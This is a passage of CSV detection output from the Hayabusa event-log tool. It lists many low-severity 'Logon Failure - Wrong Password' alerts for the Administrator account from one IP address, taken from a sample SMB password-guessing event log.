NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: 